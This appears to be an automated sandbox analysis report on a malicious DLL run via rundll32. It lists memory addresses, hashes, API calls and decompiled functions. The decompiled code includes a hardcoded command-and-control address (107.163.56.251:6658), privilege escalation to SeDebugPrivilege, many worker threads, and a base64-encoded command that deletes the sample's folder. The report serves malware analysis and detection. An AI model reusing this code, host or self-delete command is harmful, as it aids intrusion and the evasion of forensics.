0x1000c5e3
0x1000c5e7
0x1000c5f0
0x1000c5f9
0x1000c604
0x1000c607
0x1000c60c
0x1000c616
0x1000c620
0x1000c624
0x1000c628
0x1000c62c
0x1000c630
0x1000c637
0x1000c63a
0x1000c63f
0x1000c646
0x1000c649
0x1000c659
0x1000c661
0x1000c664
0x1000c669
0x1000c670
0x1000c673
0x1000c678
0x1000c67f
0x1000c682
0x1000c687
0x1000c68f
0x1000c692
0x1000c69a
0x1000c69d
0x1000c6a2
0x1000c6a9
0x1000c6ac
0x1000c6b1
0x1000c6b8
0x1000c6bb
0x1000c6be
0x1000c6c5
0x1000c6c8
0x1000c6cb
0x1000c6d1
0x1000c6d2
0x1000c6dd
0x1000c6de
0x1000c6e3
0x1000c6ed
0x1000c6ee
0x1000c6f3
0x1000c6f6
0x1000c6f8
0x1000c712
0x1000c712
0x1000c716
0x1000c719
0x1000c71d
0x1000c72e
0x1000c730
0x1000c733
0x1000c735
0x1000c73b
0x1000c742
0x1000c749
0x1000c75d
0x1000c75d
0x1000c764
0x1000c767
0x1000c76e
0x1000c773
0x1000c779
0x1000c77a
0x1000c77b
0x1000c77d
0x1000c77e
0x1000c77e
0x1000c780
0x1000c789
0x1000c78d
0x1000c78e
0x1000c78e
0x1000c79c
0x1000c79f
0x1000c79f
0x1000c7a1
0x1000c7a5
0x1000c7ae
0x1000c7b3
0x1000c7b5
0x1000c7b9
0x1000c7b9
0x1000c7bd
0x1000c7bf
0x1000c7c1
0x1000c7ea
0x1000c7ea
0x1000c7ec
0x1000c7ec
0x1000c7f0
0x1000c7f3
0x1000c81c
0x1000c81f
0x1000c825
0x1000c825
0x1000c82b
0x1000c830
0x1000c836
0x1000c839
0x1000c83c
0x1000c83e
0x00000000
0x00000000
0x1000c844
0x1000c846
0x1000c921
0x00000000
0x1000c921
0x1000c84f
0x1000c852
0x1000c854
0x1000c85a
0x1000c860
0x1000c869
0x1000c86c
0x1000c86f
0x1000c875
0x1000c8ed
0x1000c8ed
0x1000c8f4
0x1000c8fe
0x00000000
0x1000c8fe
0x1000c8f6
0x1000c8f8
0x1000c908
0x1000c908
0x1000c90f
0x1000c914
0x1000c915
0x1000c91d
0x1000c91f
0x1000c932
0x1000c932
0x1000c932
0x1000c936
0x1000c93d
0x1000c93d
0x1000c940
0x1000c942
0x00000000
0x00000000
0x1000c94a
0x1000c94f
0x1000c955
0x1000c957
0x1000c95d
0x1000c95e
0x1000c963
0x1000c974
0x1000c97c
0x1000c97d
0x1000c97e
0x1000c97f
0x1000c984
0x1000c98a
0x1000c98c
0x1000c993
0x1000c993
0x1000c999
0x1000c99b
0x00000000
0x00000000
0x1000c99d
0x1000c99d
0x1000c9a1
0x1000c9a7
0x00000000
0x1000c9a7
0x1000c98e
0x00000000
0x1000c98e
0x00000000
0x1000c91f
0x1000c8fa
0x1000c8fc
0x00000000
0x00000000
0x00000000
0x1000c8fc
0x1000c877
0x1000c879
0x1000c880
0x1000c880
0x1000c887
0x1000c88e
0x1000c890
0x1000c890
0x1000c890
0x1000c890
0x1000c8a0
0x1000c8a2
0x1000c8b3
0x1000c8b8
0x1000c8ba
0x1000c8e3
0x00000000
0x1000c8bc
0x1000c8bc
0x1000c8c3
0x1000c8c8
0x1000c8c9
0x1000c8d1
0x1000c8d3
0x00000000
0x00000000
0x1000c8d8
0x1000c8da
0x1000c8df
0x1000c8e1
0x00000000
0x00000000
0x00000000
0x1000c8e1
0x1000c8ba
0x1000c87b
0x1000c87e
0x00000000
0x00000000
0x00000000
0x1000c87e
0x1000c7f5
0x1000c7f8
0x1000c7fb
0x1000c80f
0x1000c811
0x00000000
0x00000000
0x1000c815
0x1000c80b
0x1000c80b
0x00000000
0x1000c80b
0x1000c806
0x00000000
0x1000c806
0x1000c7c3
0x1000c7c6
0x1000c7cf
0x1000c7d4
0x1000c7d7
0x1000c7d7
0x1000c7d7
0x1000c7d7
0x1000c7db
0x1000c7dd
0x00000000
0x1000c7df
0x1000c7df
0x1000c7e3
0x00000000
0x00000000
0x1000c7e5
0x1000c7e7
0x00000000
0x1000c7e7
0x00000000
0x00000000
0x00000000
0x1000c74b
0x1000c74b
0x1000c74b
0x1000c74d
0x1000c74f
0x00000000
0x00000000
0x1000c753
0x1000c759
0x1000c759
0x1000c75b
0x00000000
0x00000000
0x00000000
0x1000c75b
0x00000000
0x1000c74b
0x1000c721
0x00000000
0x1000c726
0x1000c6fc
0x00000000
0x1000c6fc
0x1000c5a1
0x1000c49b
0x1000c49e
0x1000c4a0
0x1000c4a3
0x00000000
0x1000c4a3
0x1000c487
0x1000c48a
0x1000c48c
0x1000c48f
0x00000000
0x1000c48f
0x1000c479
0x1000c47b
0x00000000
0x1000c47b
0x1000c464
0x1000c469
0x1000c46c
0x00000000
0x00000000
0x00000000
0x1000c46c
0x1000c435
0x1000c436
0x1000c43b
0x1000c443
0x1000c444
0x00000000
0x00000000
0x1000c446
0x00000000
0x1000c3d0
0x00000000
0x1000c3d0

Strings

/, xrefs: 1000C43B
UT, xrefs: 1000C6C8, 1000C6CD

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
Instruction ID: 2ff0a1464254cde498339df49cc164f73800a0e7302aa6a381dd2afc7f8218aa
Opcode Fuzzy Hash: 011cfa80826d7be16224f1e05208e39277c528805b706d3603a9fdb0960ef0be
Instruction Fuzzy Hash: 2C02D375A0438D9BEB21CF68C845F9EBBF5EF04380F1444AEE449A7246CB70AE85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10005CF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E10005CF7(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t20;
				signed int _t26;
				signed int _t30;

				_t30 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t30 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t20 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t36 = _t20;
					if(_t20 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t36, _a4, _a8,  &_v8, 0);
					E10003F92(_t36);
					if(E10003F7D(_a4, "http://") == 0) {
						goto L1;
					}
					_t26 = E10003F7D(_a4, "search");
					asm("sbb eax, eax");
					return  ~_t26 + 1;
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61

Strings

http://, xrefs: 10005D87
%s\lang.ini, xrefs: 10005D26
search, xrefs: 10005D9B

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$http://$search
API String ID: 1721638100-482061809
Opcode ID: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction ID: 8c54ec75ac406b03aa883dad07c62b5b690cd8483bd5bdce465cc98b2d904575
Opcode Fuzzy Hash: b2cb444284162266519fefa51ed0ce30d14bb4e5296eeb0978e7a1aefc3dee14
Instruction Fuzzy Hash: 971106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA71AFC44A60

Uniqueness

Uniqueness Score: -1.00%

Function 10005C4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10005C4C(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void _v267;
				char _v268;
				void* _t19;
				signed int _t24;
				signed int _t28;

				_t28 = 0x40;
				_v268 = 0;
				memset( &_v267, 0, _t28 << 2);
				asm("stosw");
				asm("stosb");
				E10003EF4( &_v268, "%s\\lang.ini", 0x100167d0);
				if(E10003F72( &_v268) != 0) {
					_v8 = 0;
					_t19 = E10004015( &_v268, 0x80000000, 0, 0, 3, 0x80, 0);
					_t32 = _t19;
					if(_t19 == 0xffffffff) {
						goto L1;
					}
					E10004035(_t32, _a4, _a8,  &_v8, 0);
					E10003F92(_t32);
					_t24 = E10003F7D(_a4, "http://");
					asm("sbb eax, eax");
					return  ~( ~_t24);
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,100167D0,?,00000000,00080000), ref: 10003F76

Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6

Strings

http://, xrefs: 10005CDC
%s\lang.ini, xrefs: 10005C7B

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
String ID: %s\lang.ini$http://
API String ID: 1721638100-679094439
Opcode ID: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction ID: 384da5e59b1e856c45bbe6372d81ece75bf9070c03a2386a6f56754dbd155cb7
Opcode Fuzzy Hash: 24de531093c0d0044616467e4bb524e46642b9e0bbaa0a360a96d55e658d7c8e
Instruction Fuzzy Hash: 601104769041197EFB21DAA4CC42FDB776CDB143C4F0085B1FA48B6080EA71AF844660

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 3556, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	50
Total number of Limit Nodes:	3

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 04170CDD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,ABAD1000,00001000,00000040,04171600,?,?,?,?), ref: 04170D5C
wsprintfA.USER32(?,?,?,?), ref: 04170E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 04170E18
ExitProcess.KERNEL32(00000000), ref: 04170E20

Strings

SWVU, xrefs: 04170D64, 04170D78, 04170D7E, 04170D84, 04170DA1
The procedure %s could not be located in the DLL %s., xrefs: 04170DF8

Memory Dump Source

Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd

Similarity

API ID: AllocExitMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 1926473177-4208015514
Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction ID: de688e78b347ade55b96ae19440d18536bd34d69ca0f351a7b7c9ed218e82262
Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction Fuzzy Hash: 01417A322417069FEB38DF14CC84EEB77B5AF48355F044258EE4AA7649EF70B9108B90

Uniqueness

Uniqueness Score: -1.00%

Function 04170C61 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32(?,?,?,?), ref: 04170E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 04170E18
ExitProcess.KERNEL32(00000000), ref: 04170E20
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 04170E69

Strings

SWVU, xrefs: 04170D78, 04170D7E, 04170D84, 04170DA1
The procedure %s could not be located in the DLL %s., xrefs: 04170DF8

Memory Dump Source

Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd

Similarity

API ID: ExitFreeMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 789587083-4208015514
Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction ID: ffd9c06621b4f548cc61733b5f2a795d3b3051c9190effe4612e1b6210c93a8c
Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction Fuzzy Hash: 6731AD322457869FEB398F10CC94FEB7BB9AF49354F044259ED4687285EF30B8148B50

Uniqueness

Uniqueness Score: -1.00%

Function 041714A4 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00001000,00000004,?,?), ref: 041714D3
VirtualProtect.KERNELBASE(?,00001000,?,?), ref: 041714F1

Memory Dump Source

Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction ID: dc229b691c096d3ee6168b0163c38ce3709b527f2d185cf7980c3a4cd5313249
Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction Fuzzy Hash: B9F0E933240245AFEB198FA4D885EEE7768DF48398B2001AAF6029A186CA71E555C754

Uniqueness

Uniqueness Score: -1.00%

Function 04170063 Relevance: 2.6, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0417007E
VirtualFree.KERNELBASE(00000000,?,00004000), ref: 041700BE

Memory Dump Source

Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction ID: 42cbb11c353dd482b8ac29f694eb1cbec4471c9d96c9d89830fc9b6d598bc3e8
Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction Fuzzy Hash: 6D0181762097017EE7314AA19C40F77BFECDF4C666F144C5AFAD5C1090DA25E4409B70

Uniqueness

Uniqueness Score: -1.00%

Function 0417002A Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000), ref: 041700BE

Memory Dump Source

Source File: 00000010.00000002.278023255.0000000004170000.00000040.00000800.00020000.00000000.sdmp, Offset: 04170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4170000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction ID: 2050db558bedd56219edd5bb10e8a3a15d4546c89a80360c0c2dd781c67f6058
Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction Fuzzy Hash: FCF0592224A30129F2106B347CC8A67BFB8DB0B379B150D97EC40D2091DF11E80286E4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 4912, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	20
Total number of Limit Nodes:	2

Executed Functions

Function 032B0CDD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,ABAD1000,00001000,00000040,032B1600,?,?,?,?), ref: 032B0D5C
wsprintfA.USER32(?,?,?,?), ref: 032B0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 032B0E18
ExitProcess.KERNEL32(00000000), ref: 032B0E20

Strings

The procedure %s could not be located in the DLL %s., xrefs: 032B0DF8
SWVU, xrefs: 032B0D64, 032B0D78, 032B0D7E, 032B0D84, 032B0DA1

Memory Dump Source

Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd

Similarity

API ID: AllocExitMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 1926473177-4208015514
Opcode ID: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction ID: df9d129dfde33c1d34ebbdd8d59f9d981a5012a4463be4a213d1cf51507151da
Opcode Fuzzy Hash: 5ac14cd0858b29816220fc40dc497103b262a89f14b24465b356eb54b5511a25
Instruction Fuzzy Hash: 75417D362517069FEB35DF14CC44EEB73B5EF48391F048119EE4697685EB70B8608B90

Uniqueness

Uniqueness Score: -1.00%

Function 032B0C61 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32(?,?,?,?), ref: 032B0E00
MessageBoxA.USER32(00000000,?,?,00000010), ref: 032B0E18
ExitProcess.KERNEL32(00000000), ref: 032B0E20
VirtualFree.KERNELBASE(?,00000000,00008000,?), ref: 032B0E69

Strings

The procedure %s could not be located in the DLL %s., xrefs: 032B0DF8
SWVU, xrefs: 032B0D78, 032B0D7E, 032B0D84, 032B0DA1

Memory Dump Source

Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd

Similarity

API ID: ExitFreeMessageProcessVirtualwsprintf
String ID: SWVU$The procedure %s could not be located in the DLL %s.
API String ID: 789587083-4208015514
Opcode ID: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction ID: 2d8328ebc84ffcdc2dfea79251046ecece462f0b3b534306cd3c366a0a9801f4
Opcode Fuzzy Hash: b4c781261df24df729712267ff34a484065b088ceee0a49b73ca0994ae2f9486
Instruction Fuzzy Hash: 9031AF362553469FDB3ACF10CC54FEB77B8AF45394F088159ED4687185EF70A4548B90

Uniqueness

Uniqueness Score: -1.00%

Function 032B14A4 Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 032B14D3
VirtualProtect.KERNEL32(?,00001000,?,?), ref: 032B14F1

Memory Dump Source

Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction ID: eaf7fbb46f83195a7242a243cec68775ec788f8865f275d8bc149001a608a7ee
Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction Fuzzy Hash: BEF0E933240245AFEB1D8FA4D895EEE7778DF48398B20016AF6029A186CA71E651C754

Uniqueness

Uniqueness Score: -1.00%

Function 032B0063 Relevance: 2.6, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 032B007E
VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032B00BE

Memory Dump Source

Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction ID: 4db07b00b664a4254425c0179fb781346dc6af7f72c9b5b7769d41297d4f4a94
Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction Fuzzy Hash: D101A4762197027EE7328AA19C00F77BBECDF48752F188C5AFAD5C5090DA65E4848B70

Uniqueness

Uniqueness Score: -1.00%

Function 032B002A Relevance: 1.3, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(00000000,?,00004000), ref: 032B00BE

Memory Dump Source

Source File: 00000012.00000002.289325786.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_32b0000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction ID: f46224d878c349d1d6a14d3b2cc63d2611fd5dcb998de6d22df1ee5c08a5c4fa
Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction Fuzzy Hash: 1FF02E2256E3126DF622F7357C44AA7FBB8EF43361B194D97DC40D6091DF11D88286E4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10008656 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 224
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
				void* _v19;
				char _v20;
				void _v1043;
				char _v1044;
				char _v1444;
				void* _v1452;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t15;
				CHAR* _t18;
				signed int _t22;
				void* _t24;
				void* _t31;
				intOrPtr* _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t56;
				intOrPtr _t64;
				void* _t66;

				_t79 = __fp0;
				_t63 = __esi;
				_t55 = __edx;
				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
				0x100337e0(0, 1, "F896SD5DAE", 0x10015a68);
				asm("daa");
				0x1003b59a(_t66);
				if(_t15 != 0xb7) {
					_t72 = _t15 - 5;
					if(_t15 != 5) {
						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1);
						_t24 = E10005986();
						0x1004075a(0x100168d4, __esi);
						_t64 =  *0x1000e094;
						if(_t24 == 0) {
							_t39 = E100044AD(_t24, __edx, 0x35);
							_pop(_t53);
							if(_t39 != 0xffffffff) {
								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
								_pop(_t53);
							}
							0x10030e70(0);
							_t66 = 0x100168d4;
							asm("adc [esp+edx+0x68], dh");
							asm("rol byte [edi], 1");
							 *_t39 =  *_t39 + _t39;
							Sleep(??);
							_t2 =  &_a12; // 0x0
							_push( *_t2);
							_t40 = L1002E51E(_t39, _t53, _t66);
							asm("repe call 0xffffbd83");
							_t76 = _t40;
							if(_t40 == 0) {
								CreateThread(0, 0, E10008578, 0, 0, 0);
							}
							E10006DD5(0, _t53, _t55, 0x100168d4, _t64, _t76, _t79);
						}
						CreateThread(0, 0, E10006EE7, 0, 0, 0);
						Sleep(0x3e8);
						_t3 =  &_v1444; // 0x10016334
						0x10033977(0x202, _t3);
						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0);
						CreateThread(0, 0, E10008208, 0, 0, 0);
						Sleep(0xbb8);
						_v20 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_t6 =  &_v20; // 0x100168c4
						_t31 = E10005ACA(_t76, _t6);
						_t77 = _t31 - 5;
						_t52 = _t66;
						if(_t31 < 5) {
							CreateThread(0, 0, E10007112, 0, 0, 0);
						}
						CreateThread(0, 0, E1000827D, 0, 0, 0);
						Sleep(0xbb8);
						CreateThread(0, 0, E1000490F, 0, 0, 0);
						CreateThread(0, 0, E10006EEF, 0, 0, 0);
						if(E10004482(_t52, _t77, _t79) == 0) {
							Sleep(0x927c0);
							CreateThread(0, 0, 0x10006a7f, 0, 0, 0);
							Sleep(0x1388);
							CreateThread(0, 0, E1000842D, 0, 0, 0);
						}
						Sleep(0xffffffff);
						L13:
						Sleep(0x36ee80);
						goto L13;
					}
				}
				_v1044 = 0;
				memset( &_v1043, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
				_t48 = 0x100167d0;
				wsprintfA( &_v1044, _t18);
				_push(0);
				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
				__eflags = _a12;
				if(_a12 != 0) {
					Sleep(0x7d0);
					0x10041059(_a12);
					__eflags = _t22 & 0xc3c95b5f;
					return _t22;
				}
				return _t22;
			}

APIs

Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19

Sleep.KERNEL32(00000000,100168D4,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100086F1
CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
Sleep.KERNEL32(000003E8,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008731
CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008766
CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087A8
CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087D6
